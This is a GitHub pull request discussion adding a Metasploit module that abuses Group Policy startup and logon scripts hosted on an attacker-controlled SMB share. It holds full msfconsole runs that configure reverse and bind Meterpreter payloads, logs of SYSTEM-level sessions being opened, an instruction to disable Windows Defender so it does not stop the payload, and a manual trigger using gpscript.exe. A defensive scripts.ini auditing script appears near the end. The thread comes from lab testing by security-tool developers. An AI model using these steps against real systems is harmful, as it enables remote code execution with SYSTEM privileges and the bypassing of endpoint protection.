
Solve #5092: Add module to exploit dangerous group policy startup scripts #5125

Merged
merged 4 commits into from May 6, 2015

Conversation

jvazquez-r7
Contributor

Provides a module to fix #5092.

Instead of BadSamba, it uses Msf::Exploit::Remote::SMB::Server::Share to make it easy :)

Verification

  • Install Windows 7 SP1 (32 bit)
  • Add a new GPO startup script. Set as its location the remote location where you will put the malicious file with msf (e.g. \\172.16.158.1\test\test.vbs). How to add a new startup script: https://technet.microsoft.com/en-us/library/cc770556.aspx
  • Run the new msf module with the SMB settings matching the startup script you configured:
msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set SHARE test
SHARE => test
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(group_policy_startup) > [*] File available on \\172.16.158.1\test\test.vbs...
[*] Server started.
  • Restart the target system (Win 7 SP1), log in, and wait a little. Shortly there should be a session in your msfconsole with SYSTEM privileges:
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49257) at 2015-04-10 13:02:39 -0500

msf exploit(group_policy_startup) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(group_policy_startup) >

@necrose99

Looks like I can kill that Gentoo ebuild :-) for the fake gem BadSamba.

* So bind payloads also work
@jvazquez-r7
Contributor Author

This pull request now also adds @hmoore-r7's feedback. It introduces the get_file_contents method to the Share mixin. It will be useful when support for multiple files is added. In the meantime, modules can override this method to provide custom contents. In this case, modules can provide the regenerated payload. So bind payloads work okay now (screenshot with set VERBOSE true):

msf exploit(group_policy_startup) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(group_policy_startup) > show options

Module options (exploit/windows/smb/group_policy_startup):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_NAME    test.vbs         no        VBS File name to share (Default: random .vbs)
   FOLDER_NAME                   no        Folder name to share (Default none)
   SHARE        test             no        Share (Default Random)
   SRVHOST      172.16.158.1     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      445              yes       The local port to listen on.


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(group_policy_startup) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started bind handler
[*] File available on \\172.16.158.1\test\test.vbs...
msf exploit(group_policy_startup) > [*] Server started.
[*] Started bind handler
[*] SMB Share - 172.16.158.132 Unknown SMB_COM_TRANSACTION2 subcommand: 10
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.bat, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.cmd, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.exe, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.com, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.pif, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.lnk, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for }\test.vbs.dll, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.bat, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.cmd, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for $\test.vbs.exe, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.com, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for |\test.vbs.pif, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.lnk, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX for \test.vbs.dll, not found
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown TRANS2_QUERY_FILE_INFORMATION with loi: 40a
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:65409 -> 172.16.158.132:4444) at 2015-04-10 18:02:48 -0500

msf exploit(group_policy_startup) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 2 closed.  Reason: User exit

@hdm
Contributor

hdm commented Apr 11, 2015

Just curious, any reason to use a VBS versus EXE for this?

@hdm
Contributor

hdm commented Apr 11, 2015

Looks like the SMB filename parameter is being misparsed in the mixin:
SMB_COM_NT_CREATE_ANDX for $\...

@Meatballs1
Contributor

Should switch on the extension and provide an exe/vbs/ps1 payload depending on the request?

def setup
  super
  self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
  exe = payload.encoded_exe
Contributor

This will never get used because of the regenerate_payload. If it did, it would be wrong, because client-side modules should always call regenerate_payload

Contributor Author

On every on_client_connect the payload is regenerated for the client; this is just an initialization. I used this initialization because indeed the encoded payload should be good enough when reverse payloads are used, shouldn't it?

So yup, just initializing things. But I can avoid the initialization if you think it is more correct.

Contributor

Probably no reason to initialize it at all, since it will not be used.

Contributor

Right, it's getting generated here and then never used; wasted cycles. I would remove this line and the next.

Contributor Author

Snif :-( I like to initialize things. But that's okay. I can delete the initialization. I won't fight all of you =) Proceeding!

@jvazquez-r7
Contributor Author

Test after last commit:

msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set SHARE test
SHARE => test
msf exploit(group_policy_startup) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
[*] File available on \\172.16.158.1\test\test.vbs...
msf exploit(group_policy_startup) > [*] Server started.
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49164) at 2015-04-15 17:51:13 -0500

msf exploit(group_policy_startup) >
msf exploit(group_policy_startup) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 1 closed.  Reason: User exit

@jvazquez-r7
Contributor Author

@hmoore-r7 asked:

Just curious, any reason to use a VBS versus EXE for this?

Because GPO supports VBS and PS initialization scripts. I used VBS to port the BadSamba technique. From the GPO options I would say it shouldn't support an EXE directly as an initialization script, but Windows can be an "obscure" system and I didn't really try.

Looks like the SMB filename parameter is being misparsed in the mixin:
SMB_COM_NT_CREATE_ANDX for $\.

Yeah, the parsing isn't super good (or good at all) (see smb_cmd_nt_create_andx). But it's good enough for now, where multiple files aren't supported: you just share one resource. But yup, in order to support multiple files in the Share mixin: a) we need to add the logic to the mixin and b) we need better parsing of the queries sending paths in the payload. It's on the TODO once we decide to invest some more time to add multi-file support to the mixin.

@wchen-r7 wchen-r7 self-assigned this Apr 24, 2015
@jvazquez-r7
Contributor Author

After doing 100 tests with @wchen-r7 (thanks a lot for helping with testing it!) we're having problems making it work on a fresh Windows 7 SP1 install after just adding the startup script to the group policy.

Maybe some configuration is missing, but I'm unable to solve it, so marking as delayed until I can answer exactly what's going on.

@jvazquez-r7 jvazquez-r7 assigned jvazquez-r7 and unassigned wchen-r7 Apr 28, 2015
@jvazquez-r7 jvazquez-r7 added the blocked Blocked by one or more additional tasks label Apr 28, 2015
@jvazquez-r7
Contributor Author

I resumed testing tonight. Several minutes after logging in to the fresh Windows 7 SP1 I got it:

msf exploit(group_policy_startup) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: windows/smb/group_policy_startup

msf exploit(group_policy_startup) >
[*] Sending stage (880640 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49159) at 2015-04-27 22:57:51 -0500

I'm going to share / ask for pcaps with @wchen-r7 to see if I can figure out what's going on and finally fix it.

@jvazquez-r7
Contributor Author

Did a couple of changes to the SMB handling, including better parsing of the PATH in NT_CREATE_ANDX requests, as pointed out by @hmoore-r7.

Anyway, I think the problems we are finding aren't related to the SMB communication but to the execution of GPO policies on the Windows side.

So, first thing: on Windows 7 SP1 I've noticed Windows Defender goes into action. So my first recommendation is to disable the Windows Defender service to be sure it isn't killing the payload.

After disabling Windows Defender I've noticed "System Startup scripts" aren't executed most of the time (I don't get SMB traffic either :?).

To mitigate this, testing with "Logon scripts" looks more reliable. Logon scripts are executed once the user logs in to his session, and are executed with user privileges (instead of system privileges).

So in order to test:

  • Disable the Windows Defender system service to be sure it isn't killing the payload.
  • Configure a System startup script as described above.
  • Configure a Logon startup script. It's similar to a startup script, but it should be added to "User Configuration \ Windows Settings \ Scripts (Logon/ Logoff)" (from gpedit).
  • Shut down the target system (with both scripts configured and Windows Defender disabled).
  • Run the module in msfconsole (with VERBOSE set to true):
msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > set share test
share => test
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set verbose true
verbose => true
msf exploit(group_policy_startup) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
[*] File available on \\172.16.158.1\test\test.vbs...
  • Start the target machine again. Wait until the logon window appears. Then wait some extra minutes (5 minutes is enough). VERIFY: are there any "SMB Share" messages in the console? If there are but you don't get a session, please write down the console output as a comment; a pcap would also be super useful.
  • Log in to Windows. Now Logon startup scripts should run. Wait some minutes after login (5 / 10 minutes should be more than enough).
    VERIFY: are there any "SMB Share" messages in the console? If there are but you don't get a session, please write down the console output as a comment; a pcap would also be super useful.

With "Logon startup" scripts, which are more reliable in my case, this is what I get in the console after login:

[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\test\test.vbs...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] SMB Share - 172.16.158.132 Unknown SMB command 71, ignoring...
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49159) at 2015-05-04 16:19:51 -0500
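The whole technique discussed in this thread hinges on a GPO startup or logon script whose registered path points at an SMB share outside the domain's SYSVOL. As an added defensive example, not part of this pull request or of Metasploit, the following parses the scripts.ini files in which Windows records GPO script registrations and flags script entries fetched from a remote host that is not a trusted domain controller / SYSVOL. The sample scripts.ini content, the trusted-host list and the hostnames in it are constructed; the file locations and the `[Startup]`/`NCmdLine` format are the real ones.

```python
# Added defensive example (not Metasploit code): audit GPO script registrations
# for scripts fetched from untrusted remote SMB shares. Windows keeps them in
# scripts.ini / psscripts.ini, e.g.
#   C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini      (local GPO)
#   \\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Scripts\scripts.ini
# with [Startup]/[Shutdown] (machine) or [Logon]/[Logoff] (user) sections and
# "0CmdLine=<path>" / "0Parameters=..." entries.
import configparser
import re

# Constructed sample in the scripts.ini format; hosts are illustrative. The
# second Startup entry mirrors the remote .vbs location used in this thread.
SAMPLE_SCRIPTS_INI = r"""
[Startup]
0CmdLine=\\corp.example\SysVol\corp.example\Policies\{GUID}\Machine\Scripts\Startup\inventory.vbs
0Parameters=
1CmdLine=\\172.16.158.1\test\test.vbs
1Parameters=
[Shutdown]
0CmdLine=C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown\cleanup.cmd
0Parameters=
"""

UNC_RE = re.compile(r"^\\\\([^\\]+)\\([^\\]+)")  # \\host\share\...


def parse_scripts_ini(text):
    """Return [(section, index, cmdline)] for every NCmdLine entry."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case so '0CmdLine' is matched literally
    cp.read_string(text)  # real files are usually UTF-16; decode before passing
    entries = []
    for section in cp.sections():
        for key, value in cp.items(section):
            m = re.fullmatch(r"(\d+)CmdLine", key)
            if m:
                entries.append((section, int(m.group(1)), value.strip()))
    return entries


def classify(cmdline, trusted_hosts):
    """'local' for non-UNC paths, 'trusted' for SYSVOL on a trusted host,
    'suspicious' for any other remote location (the pattern abused here)."""
    m = UNC_RE.match(cmdline)
    if not m:
        return "local"
    host, share = m.group(1).lower(), m.group(2).lower()
    if host in trusted_hosts and share == "sysvol":
        return "trusted"
    return "suspicious"


def audit(text, trusted_hosts):
    """Classify every script entry; trusted_hosts must be lower-case names."""
    return [(s, i, c, classify(c, trusted_hosts)) for s, i, c in parse_scripts_ini(text)]


if __name__ == "__main__":
    for section, idx, cmd, verdict in audit(SAMPLE_SCRIPTS_INI, {"corp.example"}):
        print(f"[{verdict:10}] {section}[{idx}] {cmd}")
```

Run it against scripts.ini and psscripts.ini collected from SYSVOL and from endpoints' local GroupPolicy folders; any "suspicious" entry is a script that will execute as SYSTEM (Startup) or as the user (Logon) from a share you do not control.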

@jvazquez-r7
Contributor Author

One more note: parsing and execution of startup scripts can be started manually with gpscript.exe /Startup in a CMD.

This way it should be easier to monitor with Sysinternals and get network pcaps if everything else still fails. So hopefully I can debug what's going on and make fixes if it's an msf code fault.

So if with the verification steps above there aren't sessions with either Startup or Logon scripts, we can use this method for verification / debugging. When forcing startup scripts to run manually I'm getting sessions every time.

Hopefully all of this helps to see what is going on! :)

@jvazquez-r7 jvazquez-r7 assigned wchen-r7 and unassigned jvazquez-r7 May 4, 2015
@wchen-r7
Contributor

wchen-r7 commented May 5, 2015

I will try again.

@wchen-r7 wchen-r7 merged commit b95be1b into rapid7:master May 6, 2015
wchen-r7 added a commit that referenced this pull request May 6, 2015
Labels: blocked (Blocked by one or more additional tasks), feature, module
Linked issue that this pull request may close: Support RCE via malicious GPO
6 participants